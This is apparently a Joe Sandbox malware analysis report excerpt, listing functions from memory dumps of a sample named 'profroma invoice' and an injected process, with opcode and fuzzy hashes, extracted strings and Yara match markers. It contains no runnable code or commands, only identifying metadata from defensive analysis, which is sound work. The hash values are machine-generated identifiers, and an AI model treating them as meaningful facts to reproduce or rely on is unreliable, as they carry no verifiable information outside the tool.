                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: 3245c9b7563af3ce16c41bba3c1a241256f08534930d4d83e0f41b77b2d81365
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: 85020371508342AFD709CF18C494A6BFBE5EFC8700F548A2DBA998B364DB31E945CB52
                                                          Function 0176B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                                          Function 017D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                          • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                                          • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                          • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                          Function 0174F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 0179031E
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                          • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                          • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                          • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                          Function 0175BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 01797BAC
                                                          • RTL: Resource at %p, xrefs: 01797B8E
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                          • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                          • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                          • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                          Function 0175B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 017972C1
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                          • RTL: Resource at %p, xrefs: 017972A3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                          • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                          • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                          • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                          Function 017D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                          • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                          • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                          • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                          Function 01767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                          Function 01729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                          • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                          • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                          • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

                                                          Executed Functions

                                                          Function 0292B6A4 Relevance: 34.3, Strings: 27, Instructions: 501COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "1$&E$'S$:f$=$F$Il$L6$LP$PY$Z $\$]s$]sPY$_$`$c$c\$c\$g$j$oS$s$v$w$wP$D
                                                          • API String ID: 0-3100882789
                                                          • Opcode ID: cf48cf50c94ced51141846a1b1d5d6704056a23aeef60810493e90df3ef9a1c5
                                                          • Instruction ID: 9f89f0e497fc297cead0b4067b0fc1fbdea9a9938fd8dd1e3dd2431c0eb3e6e6
                                                          • Opcode Fuzzy Hash: cf48cf50c94ced51141846a1b1d5d6704056a23aeef60810493e90df3ef9a1c5
                                                          • Instruction Fuzzy Hash: 8B529DB0D05229CBEB24CF85C9A4BEDBBB1BB44308F1085DAD54D7B284D7B56A89CF50
                                                          Function 02939574 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$O$S$\$s
                                                          • API String ID: 0-3854637164
                                                          • Opcode ID: bf23aa9432873cf03518a53e7bc7455abf27f3ddd51a0245c802110ecd17759d
                                                          • Instruction ID: 7518c8aec9c353beb7b1926cfd843fef01cd20a09c500fdee22a6c56ba82391d
                                                          • Opcode Fuzzy Hash: bf23aa9432873cf03518a53e7bc7455abf27f3ddd51a0245c802110ecd17759d
                                                          • Instruction Fuzzy Hash: D55184B2D01218ABDB15EF94DC85FEEB3BCEF84314F004699E9085B150EB755B58CBA1
                                                          Function 02946834 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &Cd_
                                                          • API String ID: 0-746913441
                                                          • Opcode ID: 5c891511ddcffe548a61c68face75fe87426266056f99a069d4ac1df79e7fad8
                                                          • Instruction ID: 14116a5591d7a6fdcd3b613abe265b65421341bfbb68020b221d946c7e24c1c7
                                                          • Opcode Fuzzy Hash: 5c891511ddcffe548a61c68face75fe87426266056f99a069d4ac1df79e7fad8
                                                          • Instruction Fuzzy Hash: C40197F2C11218AF8B44DFE8D9419EEBBF9BB58700F15426AE915F2240F7705A088FA1
                                                          Function 02924CFB Relevance: .1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a85df534b8f0a80d6cdc5a4bbfea2095544cd8133cc520468e146b242d5b958
                                                          • Instruction ID: 4d61def9e001535a641c98d7d05a6daa130747e3b2d7285eb1b7e4f3cc9bf144
                                                          • Opcode Fuzzy Hash: 9a85df534b8f0a80d6cdc5a4bbfea2095544cd8133cc520468e146b242d5b958
                                                          • Instruction Fuzzy Hash: 41412CB1D10229AFDB14CF99D881AEEBBBCEF49710F10415AFA14E7244D7B1A644CFA4
                                                          Function 0294A014 Relevance: .1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ebc6facd25896281664b8750a2dea360fec6b2184a5f688c675de731d68b5a3
                                                          • Instruction ID: f4359872bb7ecca33b465da97f6f428350df93f73463b848edc76c5bc51ebed7
                                                          • Opcode Fuzzy Hash: 4ebc6facd25896281664b8750a2dea360fec6b2184a5f688c675de731d68b5a3
                                                          • Instruction Fuzzy Hash: AE31E7B5A00208ABDB14DF98D841EEFB7F9EF88304F108119FD19A7244DB74A915CFA1
                                                          Function 0294A984 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf33bb16f2c46a21a11e7edf9585b111042fb5818533fd214216d73f8327f827
                                                          • Instruction ID: e6fe54d0e984b336c0f749b2ac8b3cfe2d828cd8e7a3e4f9ef8c30e3f26127dc
                                                          • Opcode Fuzzy Hash: bf33bb16f2c46a21a11e7edf9585b111042fb5818533fd214216d73f8327f827
                                                          • Instruction Fuzzy Hash: 5E2107B1A00648ABDB14DF98DC41FAFB7B9EF88300F10810AFD19A7244DB70A915CBA1
                                                          Function 029393B4 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7f6b4cdc90cbb617ecd447e14cd3136dbeaf26399e7dbfdcdf17970354c06e8
                                                          • Instruction ID: aba25294c24e1bc04717b56cc62328e0d8798b57f20bbb5283166547eccb5b83
                                                          • Opcode Fuzzy Hash: a7f6b4cdc90cbb617ecd447e14cd3136dbeaf26399e7dbfdcdf17970354c06e8
                                                          • Instruction Fuzzy Hash: 1911A9723803057BF720DA558C43FAB775D9BC4B25F244015FB08AF2C1DAA5B8114BB4
                                                          Function 02924EAD Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f20463a3d7eedf8770a819324b869010550fdc1ebc60759af4ce7b3127c3435
                                                          • Instruction ID: 1680b508252a43e02debdabb890caaba2b3a5bba3dcccd25e7074c7a5dd457fc
                                                          • Opcode Fuzzy Hash: 6f20463a3d7eedf8770a819324b869010550fdc1ebc60759af4ce7b3127c3435
                                                          • Instruction Fuzzy Hash: B2115C721042F657E7228F3CBC94B9FBFD8AB85634F18166AD9948F186D3219049C790
                                                          Function 029468C4 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 423a849d036eb6971466b2a7dc27fc5b7e0a1b1104fcf0ac9bb23fe7c103a971
                                                          • Instruction ID: 10e765cd1ab4f9b2625c56ff38657b00eedfa84712ae90aaa41bfc07244cd0ed
                                                          • Opcode Fuzzy Hash: 423a849d036eb6971466b2a7dc27fc5b7e0a1b1104fcf0ac9bb23fe7c103a971
                                                          • Instruction Fuzzy Hash: 2611EFB6D01219AF9B04DFA9D8419EFBBF9EB88210F10416AE915E7200E7705A058FA1
                                                          Function 02949E24 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a8cdccb619892b952e18b1b76782bbf78c96e0b6e875131917e05f185a69575
                                                          • Instruction ID: a28c630390abdc207e8511b09c71de21a50ed514a65fd99422a03f86029cb0b6
                                                          • Opcode Fuzzy Hash: 6a8cdccb619892b952e18b1b76782bbf78c96e0b6e875131917e05f185a69575
                                                          • Instruction Fuzzy Hash: 4D118E719002586BE724DFA8CC41FAF77ADEBC9300F004509FA196B280EB706A148BA1
                                                          Function 02949CA4 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08c2ba1f561c5432ca12d9fcf3fbdcf32fa6ca1f644453fac7537be90eda06dc
                                                          • Instruction ID: 332aaffe5091a17c210219ea429b363863e13faf5476ad55a2c1b657f6294ab3
                                                          • Opcode Fuzzy Hash: 08c2ba1f561c5432ca12d9fcf3fbdcf32fa6ca1f644453fac7537be90eda06dc
                                                          • Instruction Fuzzy Hash: B2117F719002546BD724DBA8DC41FEF77ADEF84704F004509FE195B280DB706A15CBA1
                                                          Function 02947C04 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 955003b43e0c04ed43148c59bdb1caf5191e37eef8db5e55a65cf7704bad13c0
                                                          • Instruction ID: 4bde4c34a6a21e7acb1c8af9713fa519f6b5f67acdc8ce088d527a9cb05fee74
                                                          • Opcode Fuzzy Hash: 955003b43e0c04ed43148c59bdb1caf5191e37eef8db5e55a65cf7704bad13c0
                                                          • Instruction Fuzzy Hash: 1111EFB6D0121DAF9B04DFE9D9409EEB7F9EF88210F0441AAE919E7200E7705A05CFA1
                                                          Function 0293956E Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                          • Instruction ID: 66692a5237551a8d957385279e2d08c92d990a04556999e81750d2b598da3178
                                                          • Opcode Fuzzy Hash: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                          • Instruction Fuzzy Hash: EB11A0729102047FEF15EBA4DC45FAE737DDB85314F004299FD08A7281EB749644CBA1
                                                          Function 0294ACF4 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                          • Instruction ID: 111f79cfd2f8385f515f3925febbb8a4794426160d99a774d4e3323ee346ef57
                                                          • Opcode Fuzzy Hash: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                          • Instruction Fuzzy Hash: 890184B6214108BBCB54DF99DC80EDB77AEAFCD714F508608BA1993245D630E851CBA4
                                                          Function 02924E48 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a9f11ac43819093b997d80d55dff5e0b4cc77b0e9656045e83124d9775b57ee
                                                          • Instruction ID: 9527fcb9c0de4e0ada006154c517b3544dd5428334b705e4d0120b7f72c6a2a5
                                                          • Opcode Fuzzy Hash: 5a9f11ac43819093b997d80d55dff5e0b4cc77b0e9656045e83124d9775b57ee
                                                          • Instruction Fuzzy Hash: 4FF024736042668FF7104F28BC44B5BB7DCEFC4238F281222E9588B291D631A4568790
                                                          Function 02949F24 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ce1e9b9ffdd3cac858b1db74bf0ffb8968d36e3b35712da21da7643fa6cd12e9
                                                          • Instruction ID: c15a16a5e5f424eb9d08622eb6a6a66e05d3d893c8ba158bd2a5149273e1d054
                                                          • Opcode Fuzzy Hash: ce1e9b9ffdd3cac858b1db74bf0ffb8968d36e3b35712da21da7643fa6cd12e9
                                                          • Instruction Fuzzy Hash: 4FF01C752002197BDB14DF99DC81EEB77ADEFC9710F004509BE1897245DA70B9118BB0
                                                          Function 02924EE8 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cffbb9c2449f1701d20f72ec4b97821a4ab4570fccf4dc3f4158285aa425be8
                                                          • Instruction ID: 42cb5293172ed6674e0ee60a896db544a6124590d2563f5e1288e8a4822105df
                                                          • Opcode Fuzzy Hash: 0cffbb9c2449f1701d20f72ec4b97821a4ab4570fccf4dc3f4158285aa425be8
                                                          • Instruction Fuzzy Hash: 76F0EC714086F34BEB65497CB941196BB60EA82B3071826B5C8E48C565E711455ECB80
                                                          Function 029394D4 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42030f2fe2bf68779df69c477925f43a6da38f8270e0870f8dcb97eb83245dcf
                                                          • Instruction ID: 9d2c7430cc00668362f7238321a4ecd59f864250dcddb6708ef8fc3cd7a31486
                                                          • Opcode Fuzzy Hash: 42030f2fe2bf68779df69c477925f43a6da38f8270e0870f8dcb97eb83245dcf
                                                          • Instruction Fuzzy Hash: E8F01271C15209EBDB14DF64D841BDEBBB8EB45320F104769E8299B280E6359754CB81
                                                          Function 0294AC14 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                          • Instruction ID: 7f7743014ea82997b3e748fa785b70d947128c427965ee4e95c6575e978b39a3
                                                          • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                          • Instruction Fuzzy Hash: 43E06D722002087BC614EE58DC44EEB33ADEFC8710F004408FA08A7241CA70B911CBB4
                                                          Function 0294AC64 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                          • Instruction ID: 70975ff5f0497a0b8abe825d4283e20d335100078a85c08142237a013c5c0d75
                                                          • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                          • Instruction Fuzzy Hash: 7FE065726002087BCA24EE99EC41EEB33ADEFC8710F008008FE08A7241CA70B9118BB4
                                                          Function 0294CAC4 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
